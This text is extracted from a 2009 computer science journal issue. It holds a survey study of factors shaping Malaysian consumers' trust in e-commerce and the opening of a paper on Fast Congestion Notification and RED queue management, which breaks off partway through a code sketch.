[8] L. A. Wolsey, Integer Programming, John Wiley & Sons, 1998.
[9] ILOG, ILOG CPLEX 10.0 User's Manual, January 2006.
[10] L. Schrage, Optimization Modeling with Lingo, Lindo Systems Inc., 1998.
[11] N. V. Nepomuceno, P. R. Pinheiro, A. L. V. Coelho, "Tackling the Container Loading Problem: A Hybrid Approach Based on Integer Linear Programming and Genetic Algorithms", Lecture Notes in Computer Science, v. 4446, pp. 154-165, 2007.
[12] N. V. Nepomuceno, P. R. Pinheiro, A. L. V. Coelho, "A Hybrid Optimization Framework for Cutting and Packing Problems: Case Study on Constrained 2D Non-guillotine Cutting", in C. Cotta and J. van Hemert (eds.), Recent Advances in Evolutionary Computation for Combinatorial Optimization, Berlin/Heidelberg: Springer-Verlag, 2008, v. 153, pp. 87-99.
[13] A. B. de Aguiar and P. R. Pinheiro, "A Model for GSM Mobile Network Design", chapter in Innovative Algorithms and Techniques in Automation, Industrial Electronics and Telecommunications, pp. 365-368, Springer Netherlands, Dordrecht, September 2007.
[14] M. Mouly and M.-B. Pautet, "GSM Protocol Architecture: Radio Sub-system Signaling", IEEE 41st Vehicular Technology Conference, 1991.
A Study on the Factors That Influence the
Consumers’ Trust on E-commerce Adoption
Yi Yi Thaw
Department of Computer and Information Sciences
Universiti Teknologi PETRONAS,
Tronoh, Perak, Malaysia
Ahmad Kamil Mahmood
Department of Computer and Information Sciences
Universiti Teknologi PETRONAS,
Tronoh, Perak, Malaysia
P.Dhanapal Durai Dominic
Department of Computer and Information Sciences
Universiti Teknologi PETRONAS,
Tronoh, Perak, Malaysia
Abstract — Electronic commerce is characterized by anonymity, uncertainty, lack of control, and potential opportunism. Its success therefore depends significantly on providing security and privacy for consumers' sensitive personal data. Consumers' reluctance to adopt electronic commerce today stems not merely from concern over the security and privacy of their personal data, but also from a lack of trust in the reliability of Web vendors. Consumers' trust in online transactions is crucial for the continuous growth and development of electronic commerce. Since Business-to-Consumer (B2C) e-commerce requires consumers to engage with the underlying technologies, consumers face a variety of security risks. This study addresses the role of consumers' security, privacy, and risk perceptions in their willingness to shop online. The analyses provide descriptive frequencies for the research variables and for each of the study's research constructs, complemented by factor analysis and Pearson correlation coefficients. The findings suggest that the effect of perceived privacy of online transactions on trust is mediated by perceived security, and that consumers' trust in online transactions is significantly related to the trustworthiness of Web vendors. Consumers' trust is also negatively associated with perceived risk in online transactions. However, neither perceived security nor perceived privacy has a significant direct impact on trust in online transactions.
Keywords — perceived security; perceived privacy; perceived risk; trust; Web vendors; consumer behavior.
I. INTRODUCTION
This study focuses on the aspect of e-commerce that utilizes the Internet and World Wide Web (WWW) as the technological infrastructure to communicate, distribute, and exchange information leading to commercial transactions between Web vendors and consumers. It also seeks to identify the main security and privacy concerns, the trustworthiness of Web vendors engaging in e-commerce transactions, and the effectiveness of security methods and applications in ensuring the confidentiality, integrity, and privacy of e-commerce transactions. The present research intends to identify the factors that are directly related to consumers' trust in adopting e-commerce in Malaysia. It is therefore undertaken to answer the following research questions: Do consumers' security and privacy concerns about online transactions significantly relate to their trust in e-commerce adoption? How do the trustworthiness and reliability of Web vendors relate to consumers' adoption of e-commerce? What are the inter-relationships among security and privacy concerns, trust beliefs, and risk perception, and how do these factors affect consumers' behavioral intention to adopt e-commerce?
II. LITERATURE REVIEW
E-commerce has gained considerable attention in the past few years, giving rise to several interesting studies and industrial applications, because the Internet has created enormous change in the business environment. The Malaysian Government has made a massive move by launching the Multimedia Super Corridor (MSC), one of whose seven flagship applications includes the active promotion of electronic business activities in the country. However, the acceptance level of electronic commerce among Malaysian consumers is still regarded as very low compared to other parts of the world, especially developed regions such as the United States and the European Union. For example, the Small- and Medium-Sized Industries Association of Malaysia said in late 2005 that less than 5% of its members were involved in B2C business. According to Krishnan [1], the majority of Malaysians interested in e-commerce are males (66%), and males below 30 years (42%) form the largest individual group of Malaysians interested in e-commerce.
A considerable body of research [2], [3], [4] has indicated that although e-commerce is spreading worldwide, customers are still reluctant to deal with it because of security and privacy issues. A study of consumer-perceived risk in e-commerce transactions by Salam et al. [5] indicated that consumers simply do not trust online vendors to
engage in transactions involving money and personalinformation. According to the authors, consumer-perceivedrisk is reduced with the increase in institutional trust andeconomic incentive.
Ahmed et al. [6] found through a survey that the major concerns in e-commerce adoption in Malaysia are the security and privacy of the online transaction process, and the trust in and reliability of online vendors. They suggested that to be successful in the electronic marketplace, organizations are expected to expend their resources and exert efforts to ensure that consumers' concerns are adequately addressed. Dauda et al. [7] studied the influence of perceived e-commerce security on the adoption of Internet banking, along with national environmental factors such as attitude, subjective norms, and perceived behavioral control, and compared these factors with Internet banking adoption in Singapore. They found that consumers' perceived non-repudiation, trust, relative advantage, Internet experience, and banking needs are the most important factors affecting adoption in Malaysia. Organizations were reluctant to use e-commerce because they felt that transactions conducted electronically were open to hackers and viruses, which were beyond their control. Khatibi et al. [8] noted that the Malaysian e-commerce industry has not taken off as expected. By means of a survey of 222 Malaysian manufacturers, traders, and service providers, the authors concluded that, from the companies' point of view, the main barriers to e-commerce adoption are concern over security and privacy, followed by the hassle of keeping up with the technology, uncertainties regarding rules and regulations, the high set-up cost of e-commerce, and the lack of skilled workers. The authors suggest that any policy aimed at promoting e-commerce should take these factors into consideration.
According to a mid-2005 survey conducted by the Malaysian Communications and Multimedia Commission (MCMC), only 9.3% of Internet users had purchased products or services through the Internet during the preceding three months [9]. The primary reasons cited are lack of security and privacy of consumers' personal data, including credit card numbers, identity theft, viruses, break-in attacks, denial-of-service, and so on. Lincoln Lee [10], Senior Analyst, Telecommunication Research, IDC Malaysia, mentioned that "the Malaysia ecommerce market has exhibited a healthy growth rate of 70% in 2006 in comparison with that in 2005. However, in order to ensure sustainable growth, there is still plenty of work to be done to develop this industry into a mature market". Jawahitha [11] raised serious concerns about the protection of Malaysian consumers dealing with e-commerce transactions. According to her, the existing laws pertaining to conventional businesses are not sufficient to address the issues in e-commerce. The Malaysian government has already taken steps to pass new laws and to amend some of the existing ones; until this effort materializes, Malaysian electronic consumers will not have adequate protection. To protect e-commerce consumers' privacy, Malaysian legislators have devised a personal data protection bill [12]. The author examined the nature, manner, and scope of personal data protection under this Bill. She notes that instead of addressing the full range of privacy and surveillance issues, the Bill deals only with the way personal data is collected, stored, used, and accessed.
In essence, numerous research papers have been published during the last few years on various issues pertaining to e-commerce. Since this paper deals with building consumers' trust in e-commerce transactions, it cites only literature relevant to that issue. The present research is intended to fill the gap regarding the identification of factors that help build Malaysian consumers' trust for greater e-commerce participation.
III. RESEARCH DESIGN AND METHOD
The main objective of this study is to identify the factorsthat contribute to the consumers’ willingness to engage in e-commerce transactions, and further study the relationshipbetween those factors. Therefore, this study will focus on thefollowing sub-objectives:
• To study whether or not consumers’ perceived securityand privacy of online transaction significantly affecttheir confidence to adopt e-commerce.
• To identify the factors of trust with web vendors to
engage in transactions involving money and personaldata.
• To study the role of institutional trust and economicincentive in consumers’ perceived risk in the context of e-commerce.
The factors considered to influence consumers' confidence in adopting e-commerce are grouped into four main categories: consumers' attitudes towards secure online transaction processing systems, privacy of consumers' personal data, trust in and reliability of online vendors, and consumers' perceived risk in e-commerce transactions. The model to be tested is shown in Figure 1.
[Figure: research model. Perceived information security (H1+), perceived information privacy (H2+, with H3+ mediation via perceived security), and trustworthiness of Web vendor (H4+) act on consumers' trust in e-commerce transactions; institutional trust (H5-) and economic incentives (H6-) act on perceived risk, which in turn relates to trust (H7-).]

Figure 1. Research Model.
Specifically, the following hypotheses are to be tested:
H1: A consumer’s perceived security of online transactionpositively contributes to his/her trust in online transaction.
H2: A consumer’s perceived privacy of online transactionpositively contributes to his/her trust in online transaction.
H3: The influence of a consumer’s perceived privacy of online transaction on trust is mediated by perceived security.
H4: A consumer’s trust in online transaction is positivelyrelated with the trustworthiness of Web vendor.
H5: The increase in institutional trust reduces consumers’perceived risk in online transaction.
H6: The increase in economic incentives reduces consumers’perceived risk in online transaction.
H7: A consumer’s trust in online transaction is negativelyassociated with perceived risk in online transaction.
A survey instrument in the form of a questionnaire was developed, consisting of three sections. Section 1 collected respondents' personal information (i.e., gender, age, race, etc.). Section 2 covered variables related to online purchasing and the adoption of electronic commerce; specifically, its questions collected information on frequency of Internet use, frequency of online purchases, intention to continue online purchasing, etc. Section 3 covered variables related to factors affecting e-commerce security, privacy, and trust, as well as risk perceptions; its questions collected information on attitudes towards secure online transaction processing systems, privacy of personal data, trustworthiness of Web vendors, and consumers' perceived risk. All the variables in this section employed a Likert scale with endpoints ranging from 1 (strongly disagree) to 5 (strongly agree).
Before mass distribution, the questionnaire was pre-tested and pilot-tested through a series of informal interviews with faculty and doctoral students to ensure that the constructs were properly operationalized. The item measures were suitably modified or adapted from the extant literature. Based on a pilot study with 25 master's and doctoral students assessing comprehensiveness, clarity, and appropriateness, 5 items for perceived security, 6 items for perceived privacy, 5 items for trustworthiness of Web vendors, 3 items for consumers' perceived risk, 2 items for economic incentives, 2 items for institutional trust, and 2 items for consumers' trust were incorporated into the study instrument. The target group of respondents was Internet-savvy students: 85 full-time final-year undergraduate students (50.6% male and 49.4% female) from two local universities participated in this study. The majority of the respondents (about 98.8%) are aged between 20 and 30, while the remaining 1.2% are aged between 31 and 40. In terms of race, about 57.6% are Malay, about 18.8% Chinese, and about 15.3% Indian.
IV. DATA ANALYSIS
Of the 85 respondents, almost all (about 96.5%) report that they frequently use the Internet, while the remaining 3.5% seldom use it. The respondents had no experience with online purchases, so they were asked about their willingness to make online purchases in the near future: about 49.4% are not willing, while about 8.3% are willing. The respondents who are not willing to purchase online in the near future were then asked for their reasons. The major reason (35.5%) was concern over the security and privacy of their personal data, followed by lack of interaction (about 27.1%) and inability to feel the product (about 22.4%). All the respondents were also asked their opinion on credit card security for online purchases. The majority (about 54.1%) believe that using a credit card for online purchases is not safe, while about 11.8% believe it is somewhat safe. About 8.2% of the respondents are indifferent to online credit card security, and the remaining respondents (about 24.7%) are not sure.
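The descriptive frequencies and item means reported in the following subsections can be reproduced from raw 5-point Likert responses with a few lines of standard-library Python. A minimal sketch follows; the response vector is invented for illustration, not the study's data.

```python
# Hedged sketch: agree/neutral/disagree percentages and the item mean for
# one 5-point Likert item (1 = strongly disagree ... 5 = strongly agree).
# The responses below are hypothetical, not the 85 questionnaire records.
from collections import Counter
from statistics import mean

responses = [1, 2, 2, 3, 3, 3, 4, 4, 5, 2]  # hypothetical item responses

counts = Counter(responses)
n = len(responses)
disagree = 100 * (counts[1] + counts[2]) / n  # scale points 1 and 2
neutral = 100 * counts[3] / n                 # scale point 3
agree = 100 * (counts[4] + counts[5]) / n     # scale points 4 and 5

print(f"disagree {disagree:.1f}%  neutral {neutral:.1f}%  "
      f"agree {agree:.1f}%  mean {mean(responses):.2f}")
```

The same three percentages and the mean are what each bar chart in Section IV summarizes per item.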
A. Descriptive Analysis
1) Information security concerns: Regarding online information security, only 10.6% of the respondents agree that they would feel totally safe providing sensitive information about themselves over the Web, while the majority (about 57.7%) do not believe this and about 31.8% remained neutral. Regarding online payment, about 22.4% of the respondents agree that the payment information they enter online is safe and accessible only by the intended persons, while a plurality (about 41.1%) do not believe this; the remaining 36.5% remained indifferent. On the integrity of online transactions, only 11.8% of the respondents believe that the information they enter online is not altered in transit, while 33.0% do not believe this; the remaining majority (about 55.3%) remained neutral. About 17.6% of the respondents agree that they would not hesitate to make purchases from the Web despite security concerns over sensitive information, while about 40.0% do not agree; the remaining 42.4% remained indifferent. Overall, about 31.8% of the respondents believe that there is adequate control in place to ensure the security of personal data transmitted during online transaction processing, while about 30.6% do not believe this and about 37.6% remained neutral.
[Figure: bar chart of item means (approximately 2.3 to 3.0) for the five information security items: feel safe providing info over Web; accessible only by intended recipient; info is not altered in transit; not hesitate to purchase despite security issues; adequate control to ensure security.]

Figure 2. Mean of Information Security Concerns.
2) Information privacy concerns: Regarding misuse of information, about 36.5% of the respondents believe that their personal information would not be misused when transacting with online companies, while about 23.5% do not believe this; the remaining 40.0% remained neutral. Regarding control over information, about 42.3% of the respondents believe that they have control over how the information they provide will be used by online companies, while about 24.7% do not believe this; the remaining 32.9% remained indifferent. Moreover, about 31.8% of the respondents believe that they can later verify the information they provide during a transaction with online companies, while about 24.7% do not believe this; the remaining 43.5% remained neutral. In addition, only 25.9% of the respondents believe that online companies will not reveal their sensitive information without their consent, while about 30.6% do not believe this and a plurality (about 43.5%) remained neutral. Regarding an effective mechanism, about 35.3% of the respondents believe that there is an effective mechanism to address any violation of the sensitive information they provide to online companies, while about 20.0% do not believe this; the remaining plurality (about 44.7%) remained indifferent. Overall, about 35.3% of the respondents believe that there is adequate control in place to protect the privacy of personal information within online companies, while about 18.8% do not believe this and a plurality (about 45.9%) remained indifferent.
[Figure: bar chart of item means (approximately 2.85 to 3.15) for the six information privacy items: info would not be misused; control over how info will be used; later verify info; companies will not reveal info; effective mechanism to address violation; adequate control to ensure privacy.]

Figure 3. Mean of Information Privacy Concerns.
3) Trustworthiness of Web vendors: Regarding trust beliefs about Web vendors, about 36.5% of the respondents believe that online companies will act with high business standards, while about 24.7% do not believe this; the remaining 38.8% remained indifferent. On skills and expertise, a plurality (about 48.2%) of the respondents believe that online companies have the skills and expertise to perform transactions in the expected manner, while about 22.3% do not believe this; the remaining 29.4% remained neutral. Regarding whether online companies are dependable, about 30.6% of the respondents believe they are, while about 24.7% do not; the remaining 44.7% remained indifferent. Moreover, about 29.4% of the respondents believe that online companies do not have ill intentions towards any of their consumers, while about 31.7% do not believe this; the remaining 38.8% remained indifferent. Overall, only 22.4% of the respondents believe that online companies are trustworthy, while about 25.9% do not believe this and the majority (about 51.8%) remained neutral.
[Figure: bar chart of item means (approximately 2.85 to 3.25) for the five trustworthiness items: companies will act with high business standards; companies have skills and expertise; companies are dependable; do not have ill intentions towards consumers; companies are trustworthy.]

Figure 4. Mean of Trustworthiness of Web Vendors.
4) Risk perception: Regarding risk perception, a plurality (about 48.3%) of the respondents believe that providing credit card information over the Web is unsafe, while only 18.8% do not believe this; the remaining 32.9% remained indifferent. In addition, the majority (about 54.1%) of the respondents believe that it would be risky to give personal information to online companies, while about 17.7% do not believe this; the remaining 28.2% remained indifferent. Furthermore, the majority (about 51.7%) of the respondents agree that there would be too much uncertainty associated with providing personal information to online companies, while about 18.8% do not agree; the remaining 29.4% remained neutral.
[Figure: bar chart of item means (approximately 3.44 to 3.52) for the three risk perception items: credit card info over the Web is unsafe; risky to give info; uncertainty in providing info.]

Figure 5. Mean of Risk Perception.
Most items loaded onto the extracted factors, except for some of the items conceptualized to measure information security concerns, information privacy concerns, and trust beliefs about Web vendors. The item on adequate control to ensure security loaded fairly onto the trust-beliefs factor, while the item on companies not having ill intentions towards consumers loaded slightly onto the information security concerns factor. The items on later verifying information and on an effective mechanism to address violations, from the information privacy concerns factor, loaded fairly onto factor one (trust beliefs of Web vendors), and the item on companies being dependable, from the trust-beliefs factor, loaded onto factor three. Three items, namely feel safe providing information over the Web, information would not be misused, and companies are trustworthy, had factor loadings lower than 0.50.
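The item-retention rule applied here (an item is kept only if its largest absolute loading on some extracted factor reaches 0.50) can be expressed directly. In this sketch the item names echo the questionnaire, but the loading values are invented for illustration, not the study's actual factor matrix.

```python
# Hedged sketch of the 0.50 factor-loading retention rule.
# The loading values below are hypothetical, not the study's results.
loadings = {
    # item: (factor 1, factor 2, factor 3) loadings
    "feel safe providing info over Web": (0.31, 0.22, 0.18),
    "accessible only by intended recipient": (0.12, 0.68, 0.09),
    "companies are trustworthy": (0.44, 0.27, 0.38),
    "companies are dependable": (0.21, 0.15, 0.61),
}

THRESHOLD = 0.50

def retained(item_loadings, threshold=THRESHOLD):
    """Keep an item only if it loads at least `threshold` on some factor."""
    return max(abs(l) for l in item_loadings) >= threshold

kept = [item for item, ls in loadings.items() if retained(ls)]
dropped = [item for item, ls in loadings.items() if not retained(ls)]
print("kept:", kept)
print("dropped:", dropped)
```

Under these hypothetical loadings, the two items whose maximum loading falls below 0.50 would be dropped, mirroring the treatment of the three weak items above.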
D. Hypothesis Testing
Pearson correlation coefficients were computed in order totest the relationships between each factor and consumers’ trustin e-commerce transactions.
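As a minimal illustration of this step, the Pearson coefficient (and the t statistic from which the reported p-values follow, with n - 2 degrees of freedom) can be computed directly. The construct scores below are hypothetical, not the study's 85 responses.

```python
# Hedged sketch: Pearson correlation between two construct scores,
# plus the t statistic used to judge significance. Data are invented.
import math

def pearson_r(x, y):
    """Pearson product-moment correlation coefficient."""
    n = len(x)
    mx, my = sum(x) / n, sum(y) / n
    cov = sum((a - mx) * (b - my) for a, b in zip(x, y))
    sx = math.sqrt(sum((a - mx) ** 2 for a in x))
    sy = math.sqrt(sum((b - my) ** 2 for b in y))
    return cov / (sx * sy)

def t_statistic(r, n):
    """t statistic for testing r != 0; the p-value is then read from a
    t-distribution with n - 2 degrees of freedom."""
    return r * math.sqrt((n - 2) / (1 - r ** 2))

# Hypothetical per-respondent construct scores (e.g., mean Likert score).
trust = [3.0, 2.5, 4.0, 3.5, 2.0, 4.5, 3.0, 2.5]
risk = [3.5, 4.0, 2.0, 3.0, 4.5, 1.5, 3.5, 4.0]

r = pearson_r(trust, risk)
print(f"r = {r:.3f}, t = {t_statistic(r, len(trust)):.3f}")
```

A strongly negative r with a large-magnitude t, as in this toy sample, corresponds to the kind of significant negative association reported for H7.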
H1: A consumer’s perceived security of online transaction
positively contributes to his/her trust in online transaction.
The correlation coefficient between consumers' attitude towards secure online transactions and their confidence to adopt e-commerce was not statistically significant (p = 0.545). Therefore, the research hypothesis is not accepted.
H2: A consumer’s perceived privacy of online transaction positively contributes to his/her trust in online transaction.
The results of the study show no significant relationship between perceived privacy and consumers' confidence to adopt e-commerce (r = 0.002, p = 0.986). Therefore, we reject the research hypothesis.
H3: The influence of a consumer’s perceived privacy of
online transaction on trust is mediated by perceived security.
The results of the study show that the influence of a consumer's perceived privacy of online transactions on trust is mediated by perceived security (r = 0.424). The relationship is statistically significant at the 0.01 level (p = 0.000). Therefore, we accept the research hypothesis.
H4: A consumer’s trust in online transaction is positivelyrelated with the trustworthiness of Web vendor.
The correlation coefficient between the trustworthiness of Web vendors and consumers' confidence to adopt e-commerce was found to be 0.218 (p = 0.045). Therefore, the research hypothesis is accepted.
H5: The increase in institutional trust reduces consumers’ perceived risk in online transaction.
We found that an increase in institutional trust does not reduce consumers' perceived risk in online transactions (r = 0.148, p = 0.176). Therefore, we reject the research hypothesis.
H6: The increase in economic incentives reducesconsumers’ perceived risk in online transaction.
We also found that an increase in economic incentives does not reduce consumers' perceived risk in online transactions; the relationship is not statistically significant (p = 0.484). Therefore, we reject the research hypothesis.
H7: A consumer’s trust in online transaction is negativelyassociated with perceived risk in online transaction.
The results of the study show that a consumer's trust in online transactions is negatively associated with perceived risk in online transactions (r = -0.388). The relationship is statistically significant at the 0.01 level (p = 0.000). Therefore, we accept the research hypothesis.
V. MANAGERIAL IMPLICATIONS
The present study finds that neither perceived security nor perceived privacy acts directly upon trust in electronic commerce transactions; rather, perceived privacy's effect on trust is mediated by perceived security. Organizations that are involved, or will be involved, in e-commerce are expected to act with high business standards and to have the skills and expertise to perform transactions in the expected manner. In addition, organizations should implement effective mechanisms to address any violation of consumers' sensitive data by placing adequate controls to ensure the security of personal data.

Although Web vendors today employ both fair information practices and information security practices in their online transactions, consumers do not fully understand how the actions undertaken by Web vendors ease their risk. This may be due to a significant difference between public perceptions and expert assessments of technology-related risks. To enhance Web vendors' reputations, organizations should offer education and awareness programs on the effectiveness of the mechanisms protecting consumers' personal data shared online.
VI. LIMITATIONS OF THE STUDY
The study has several limitations that affect the reliability and validity of the findings. It did not take into account gender, cultural, income, or other demographic variables in the research hypotheses. Further, only self-selected respondents participated in the study, so a self-selection bias might have affected the findings and may limit their generalizability. Since sampling was based on a convenience sample of students, the responses might not truly reflect the population in general, and the findings may not represent Malaysian consumers as a whole; therefore, any generalization of the findings should be made with caution. The model may also have excluded other possible factors influencing consumers' trust in e-commerce transactions (e.g., the study did not consider other beliefs, such as perceived usefulness and perceived ease of use).

Future studies could also link other demographic variables of consumers, as well as Web vendors' reputation and the site's usefulness and ease of use. These dimensions may yield interesting recommendations on differences in the trust-building mechanisms to be adopted. Further,
future studies could differentiate between the perceptions of consumers who have not transacted online and those of consumers who have.
VII. CONCLUSIONS
This study concludes that while the trustworthiness of Web vendors is a critical factor in explaining consumers' trust in adopting e-commerce, it is also important to pay attention to consumers' risk concerns about e-commerce transactions. Although in previous research security and privacy appear to be the top concerns for consumers' trust in e-commerce adoption, the empirical results indicate poor correlations of perceived security and perceived privacy with consumers' trust. This may be because, as consumers get used to the Internet and to the techniques available to protect themselves online, security and privacy become less sensitive matters over time. However, the construct of perceived privacy manifests itself primarily through perceived security. As the trustworthiness of Web vendors lies at the heart of an enduring B2C e-commerce relationship, Web-based organizations need to find ways of improving consumers' perception of their trustworthiness in order to utilize the full potential of e-commerce.
REFERENCES
[1] Krishnan, G., “Internet marketing exposure in Malaysia,”http://www.gobalakrishnan.com/2006/12/malaysia-internet-marketing/ ,2006.
[2] Ahuja, M., Gupta, B. and Raman, P., “An Empirical investigation of online consumer purchasing behavior,” Communications of the ACM,vol. 46, no. 12, pp. 145-151, 2003.
[3] Basu, A. and Muylle, S., “Authentication in e-commerce,”Communications of the ACM, vol. 46, no. 12, pp. 159-166, 2003.
[4] Bingi, P., Mir, A. and Khamalah, J., “The challenges facing global e-commerce,” Information System Management, vol. 17, no. 4, pp.26-34,2000.
[5] Salam, A.F., Rao, H.R. and Pegels, C.C., “Consumer-perceived risk in e-commerce transactions”, Communications of the ACM , vol. 46, no. 12,pp. 325-331, 2003.
[6] Ahmed, M., Hussein, R., Minakhatun, R. and Islam, R., “Buildingconsumers’ confidence in adopting e-commerce: a Malaysian case,” Int.J. Business and Systems Research, vol. 1, no. 2, pp.236–255, 2007.
[7] Dauda, Y., Santhapparaj, AS., Asirvatham, D. and Raman, M., “TheImpact of E-Commerce Security, and National Environment onConsumer adoption of Internet Banking in Malaysia and Singapore,”
Journal of Internet Banking and Commerce , vol. 12, no. 2, Aug 2007.
[8] Khatibi, A., Thyagarajan, V. and Scetharaman, A., “E-commerce in Malaysia: Perceived benefits and barriers,” Vikalpa, vol. 28, no. 3, pp. 77-82, 2003.
[9] Economist Intelligence Unit, “Overview of e-commerce in Malaysia,” The Economist, http://globaltechforum.eiu.com/index.asp?layout=printer_friendly&doc_id=8706, 13 June 2006.
[10] IDC Malaysia, “IDC Reports 70% Growth in Malaysia eCommerceSpending in 2006,” http://www.idc.com.my/PressFiles/IDC%20Malaysia%20-%20eCommerce.asp, 24 January, 2007
[11] Jawahitha, S., “Consumer Protection in E-Commerce: Analysing the Statutes in Malaysia,” The Journal of American Academy of Business, Cambridge, vol. 4, no. 1/2, pp. 55-63, 2004.
[12] Azmi, I.M., “E-commerce and privacy issues: an analysis of the personal
data protection bill,” International Review of Law Computers andTechnology, vol. 16, no. 3, pp.317–330, 2002.
AUTHORS PROFILE
Yi Yi Thaw (rashidah_minakhatun@utp.edu.my) is a PhD student at the Department of Computer and Information Sciences, Universiti Teknologi PETRONAS, 31750, Tronoh, Perak, Malaysia.
Dr. Ahmad Kamil Mahmood (kamilmh@petronas.com.my) is an Associate Professor at the Department of Computer and Information Sciences, Universiti Teknologi PETRONAS, 31750, Tronoh, Perak, Malaysia.
Dr. P. Dhanapal Durai Dominic (dhanapal_d@petronas.com.my) is a Senior Lecturer at the Department of Computer and Information Sciences, Universiti Teknologi PETRONAS, 31750, Tronoh, Perak, Malaysia.
159 ISSN 1947 5500
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4 , No. 1 & 2 , 2009
The Uniformization Process of the Fast Congestion
Notification (FN)
Mohammed M. Kadhum
InterNetWorks Research Group
College of Arts and Sciences
Universiti Utara Malaysia
06010 UUM Sintok, Malaysia
kadhum@uum.edu.my
Suhaidi Hassan
InterNetWorks Research Group
College of Arts and Sciences
Universiti Utara Malaysia
06010 UUM Sintok, Malaysia
suhaidi@uum.edu.my
Abstract — Fast Congestion Notification (FN) is a proactive queue management mechanism that practices congestion avoidance, helping to avert the onset of congestion by marking/dropping packets before the router's queue becomes full, and that exercises congestion control, when congestion avoidance fails, by increasing the rate of packet marking/dropping. Technically, FN avoids queue overflow by keeping the instantaneous queue size below the optimal queue size, and controls congestion by keeping the average arrival rate close to the outgoing link capacity. Upon each packet arrival, FN uses the instantaneous queue size and the average arrival rate to calculate the packet marking/dropping probability. FN marks/drops packets at fairly regular intervals to avoid both long intermarking intervals and clustered packet marks/drops: too many marked/dropped packets close together can cause global synchronization, while too long an interval between marked/dropped packets can allow large queue sizes and congestion. This paper shows how FN controls the queue size, avoids congestion, and reduces global synchronization by uniformizing the intervals between marked/dropped packets.
Keywords-Internet Congestion; Active Queue Management (AQM); Random Early Detection (RED); Fast Congestion Notification (FN); Packet Mark/Drop Probability
I. INTRODUCTION
Internet gateways' queues are used to accommodate incoming packets and to allow the gateway enough time for packet transmission. When the arrival rate is higher than the gateway's outgoing link capacity, the queue size will increase until the gateway buffer becomes full. When the buffer is full, newly arriving packets will be dropped.
In the current Internet, the TCP transport protocol detects congestion only after a packet has been marked/dropped at the gateway. However, it would clearly be undesirable to have large queues that are full much of the time; this would significantly increase the average delay in the network. Hence, with increasingly high-speed networks, it is important to have mechanisms that keep throughput high but average queue sizes low [1].
Active queue management (AQM) mechanisms mark/drop
packets before the gateway’s buffer is full. These mechanisms
operate by maintaining one or more mark/drop probabilities,
and probabilistically dropping/marking packets even when the
queue is short.
II. ACTIVE QUEUE MANAGEMENT (AQM)
Active queue management policies, such as Random Early Detection (RED), are expected to eliminate the global synchronization introduced by reactive queue management policies and to improve the Quality of Service (QoS) of networks. The promised advantages of AQM are increased throughput, reduced delay, high link utilization, and avoidance of lock-out. AQM provides preventive measures to manage the router queue and overcome the problems associated with passive queue management policies. AQM has the following attributes:
Performing a preventive random packet mark/drop before the queue is full.
Making the probability of the preventive packet mark/drop proportional to the congestion level.
Preventive packet marks/drops provide an implicit feedback method to notify the traffic senders of the congestion onset [2]. In reaction, senders reduce their transmission rates to moderate the congestion level. Arriving packets from the senders are marked/dropped randomly, which prevents senders from backing off at the same time and thereby eliminates global synchronization [2].
Different packet marking/dropping strategies have different impacts on gateway performance, including packet delays, the number of dropped packets, and link utilization. Generally, under a given AQM scheme, if a gateway drops packets more aggressively, fewer packets will be admitted and go through the gateway, so the outgoing link's utilization may be lower; in return, the admitted packets will experience smaller delays. Conversely, under an AQM scheme which drops packets less aggressively, the admitted packets may be queued up at the gateway, so the admitted packets will experience larger delays. But in this case the outgoing link's utilization may be higher, since more packets are admitted and transmitted by the gateway [3].
A. Random Early Detection (RED)
RED [1] is an AQM mechanism that requires the user to specify five parameters: the maximum buffer size or queue limit (QL), the minimum (minth) and maximum (maxth) thresholds of the "RED region", the maximum dropping probability (maxp), and the weight factor used to calculate the average queue size (wq). QL can be defined in terms of packets or bytes.
or bytes. A RED gateway uses early packet dropping in an
attempt to control the congestion level, limit queuing delays,
and avoid buffer overflows. Early packet dropping starts when
the average queue size exceeds minth. RED was specifically
designed to use the average queue size (avg), instead of the
current queue size, as a measure of incipient congestion,
because the latter proves to be rather intolerant of packet
bursts. If the average queue size does not exceed minth, a RED
gateway will not drop any packet. avg is calculated as an
exponentially weighted moving average using the following
formula:
avgi = (1 - wq) × avgi-1 + wq × q    (1)
where the weight wq is commonly set to 0.002, and q is the instantaneous queue size. This weighted moving average
captures the notion of long-lived congestion better than the
instantaneous queue size [4]. Had the instantaneous queue size
been used as the metric to determine whether the router is
congested, short-lived traffic spikes would lead to early packet
drops. So a rather underutilized router that receives a burst of
packets can be deemed "congested" if one uses the
instantaneous queue size. The average queue size, on the other
hand, acts as a low pass filter that allows spikes to go through
the router without forcing any packet drops (unless, of course,
the burst is larger than the queue limit). The user can configure
wq and minth so that a RED router does not allow short-lived
congestion to continue uninterrupted for more than a predetermined amount of time. This functionality allows RED
to maintain high throughput and keep per-packet delays low.
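The low-pass-filter behaviour of Eq. (1) can be illustrated with a short sketch (not from the paper; the function name and the burst scenario are ours):

```python
# Illustrative sketch of Eq. (1): the EWMA of the queue size acts as a
# low-pass filter that absorbs short-lived traffic bursts.

def update_avg(avg, q, w_q=0.002):
    """One step of avg_i = (1 - w_q) * avg_(i-1) + w_q * q."""
    return (1 - w_q) * avg + w_q * q

avg = 0.0
for _ in range(10):          # a 10-packet burst with instantaneous queue 100
    avg = update_avg(avg, 100)
# avg is still only about 2, so the burst alone would not trigger early drops.
```

Even though the instantaneous queue jumps to 100, the average barely moves, which is exactly why RED keys its dropping decision on avg rather than on q.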
RED uses randomization to decide which packet to drop
and, consequently, which connection will be notified to slow
down. This is accomplished using a probability pa, which is
calculated according to the following formulae:
pb = maxp × (avg - minth) / (maxth - minth)    (2)
and
pa = pb / (1 - count × pb)    (3)
where maxp is a user-defined parameter, usually set to 2% or
10% , and count is the number of packets since the last packet
mark/drop. count is used so that consecutive marks/drops are
spaced out over time. Notice that pb varies linearly between 0
and max p, while pa, i.e., the actual packet marking/dropping
probability increases with count [5]. Originally, maxth was
defined as the upper threshold; when the average queue size
exceeds this limit, all packets have to be dropped (Figure
1(a)). Later on, a gentle version of RED [6] was proposed as a
modification to the dropping algorithm, under which packets
are dropped with a linearly increasing probability
until avg exceeds 2×maxth; after that all packets are dropped
(Figure 1(b)). Although maxth can be set to any value, a rule of
thumb is to set it to three times minth, and less than QL [4].
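Equations (2)-(3), together with the gentle extension of [6], can be sketched as follows (the function names and the sample parameter values are our own, chosen only for illustration):

```python
def red_pb(avg, min_th, max_th, max_p, gentle=False):
    """Base probability pb of Eq. (2), with the gentle variant of [6]."""
    if avg < min_th:
        return 0.0
    if avg < max_th:
        return max_p * (avg - min_th) / (max_th - min_th)   # Eq. (2)
    if gentle and avg < 2 * max_th:
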